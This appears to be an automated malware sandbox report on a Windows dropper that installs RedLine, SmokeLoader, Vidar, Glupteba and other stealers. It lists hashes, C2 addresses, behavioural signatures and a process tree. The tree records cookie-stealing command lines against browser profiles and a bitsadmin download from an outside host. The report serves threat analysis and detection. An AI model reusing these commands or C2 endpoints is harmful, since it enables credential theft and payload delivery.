Resubmissions
19-08-2021 18:59
210819-yrzbdtvqln 1018-08-2021 20:25
210818-4hztrzavcs 1018-08-2021 17:24
210818-9p8lqjhwv2 1017-08-2021 06:12
210817-kl4jvaaq7x 1016-08-2021 10:04
210816-nwc3tqkr3a 1016-08-2021 10:04
210816-5r5rafnh7e 1016-08-2021 10:04
210816-kdgh648t5e 1016-08-2021 09:37
210816-9esgfwsmfe 1016-08-2021 08:13
210816-26la9rblgn 1017-08-2021 08:51
210817-w2l5yq2wlnAnalysis
-
max time kernel
111s -
max time network
1801s -
platform
windows11_x64 -
resource
win11 -
submitted
17-08-2021 08:51
General
-
Target
EB7233922891E1DAD0434FBD52623647.exe
-
Size
7.9MB
-
MD5
eb7233922891e1dad0434fbd52623647
-
SHA1
331126b108532ab9a1e932141bff55a38656bce9
-
SHA256
b39e29c24003441609c457a3455cae9d9fb6f4462f5e06d0c1d317d243711cb8
-
SHA512
597fbb0f397c45c8a2c5f63893c6d6bd4641e952510dfcac05dadb7afaaf4e005df1261649d4e79951979bad0be1fb09feebac7a6d23c31679590cbf40e1d4ac
Score
10/10
Malware Config
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
redline
Botnet
4
C2
213.166.68.170:16810
Extracted
Family
smokeloader
Version
2020
C2
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
rc4.i32
rc4.i32
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 1 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Suspicious use of NtCreateProcessExOtherParentProcess 15 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
evasion 5 IoCs
evasion.
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
-
VMProtect packed file 1 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 2 IoCs
-
Loads dropped DLL 12 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 5 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 20 IoCs
-
NSIS installer 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 25 IoCs
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 4 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SetWindowsHookEx 36 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/19Pfw72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a647183⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:23⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4608 /prefetch:23⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1232 /prefetch:13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:13⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe" -a3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\uAa_AbxThvGNSkQqNALUo28a.exe"C:\Users\Admin\Documents\uAa_AbxThvGNSkQqNALUo28a.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\Documents\HA0R0oOrvoeWkYK_NWGeEuqA.exe"C:\Users\Admin\Documents\HA0R0oOrvoeWkYK_NWGeEuqA.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"4⤵
-
-
C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"4⤵
-
-
C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"4⤵
-
-
-
C:\Users\Admin\Documents\ZNjEI97V8_TzeA2vWbShf6jj.exe"C:\Users\Admin\Documents\ZNjEI97V8_TzeA2vWbShf6jj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\ZNjEI97V8_TzeA2vWbShf6jj.exe"C:\Users\Admin\Documents\ZNjEI97V8_TzeA2vWbShf6jj.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Documents\mRMKJujcnUvhd7DjNMDCb8eN.exe"C:\Users\Admin\Documents\mRMKJujcnUvhd7DjNMDCb8eN.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\Documents\0OT08f9pu9hybIxDMQ79H_UI.exe"C:\Users\Admin\Documents\0OT08f9pu9hybIxDMQ79H_UI.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5360 -s 2444⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exe"C:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exeC:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exe4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\VBzqFkfsDOMfFiW5eX98wd2t.exe"C:\Users\Admin\Documents\VBzqFkfsDOMfFiW5eX98wd2t.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 3124⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\ABhgA1_JcNSjunWCJULBHWy2.exe"C:\Users\Admin\Documents\ABhgA1_JcNSjunWCJULBHWy2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\maeApavXFRVyTdV1Ikfwiplv.exe"C:\Users\Admin\Documents\maeApavXFRVyTdV1Ikfwiplv.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5328 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exe"C:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exeC:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\KV7A28Kr66vqyPcOoBia8YpL.exe"C:\Users\Admin\Documents\KV7A28Kr66vqyPcOoBia8YpL.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\FkdTCM26AHjprP7cVvGtWYus.exe"C:\Users\Admin\Documents\FkdTCM26AHjprP7cVvGtWYus.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 2924⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\1qYRY02GWnuOYFefe_sWbDLj.exe"C:\Users\Admin\Documents\1qYRY02GWnuOYFefe_sWbDLj.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\1qYRY02GWnuOYFefe_sWbDLj.exe"C:\Users\Admin\Documents\1qYRY02GWnuOYFefe_sWbDLj.exe"4⤵
-
-
-
C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe"C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\4VhdBSLn5e31ry9R4lNsreSR.exe"C:\Users\Admin\Documents\4VhdBSLn5e31ry9R4lNsreSR.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\1xwHsYY6JY2X9HJMmqNaZyN_.exe"C:\Users\Admin\Documents\1xwHsYY6JY2X9HJMmqNaZyN_.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\FXxQSNcPioIFIlbegIsf_vj4.exe"C:\Users\Admin\Documents\FXxQSNcPioIFIlbegIsf_vj4.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\s9CZCVkwZnCKvuAXID9kjcGG.exe"C:\Users\Admin\Documents\s9CZCVkwZnCKvuAXID9kjcGG.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7036493.exe"C:\Users\Admin\AppData\Roaming\7036493.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4964 -s 23085⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Roaming\3529569.exe"C:\Users\Admin\AppData\Roaming\3529569.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\sDD53xiAFXf45j9jMPz5AqNg.exe"C:\Users\Admin\Documents\sDD53xiAFXf45j9jMPz5AqNg.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\kUZysLnJ5VU1GTZZD0uqlySQ.exe"C:\Users\Admin\Documents\kUZysLnJ5VU1GTZZD0uqlySQ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\kUZysLnJ5VU1GTZZD0uqlySQ.exe"C:\Users\Admin\Documents\kUZysLnJ5VU1GTZZD0uqlySQ.exe" -q4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\Documents\9avfIn5IigP_u4pj8JpAtsYA.exe"C:\Users\Admin\Documents\9avfIn5IigP_u4pj8JpAtsYA.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z4⤵
- Download via BitsAdmin
-
-
-
C:\Users\Admin\Documents\kGZKvxo6ms4BQ5U8cuw3ZTub.exe"C:\Users\Admin\Documents\kGZKvxo6ms4BQ5U8cuw3ZTub.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 2444⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\LSBnF4NXGH5rmUEXTqMKoFvs.exe"C:\Users\Admin\Documents\LSBnF4NXGH5rmUEXTqMKoFvs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
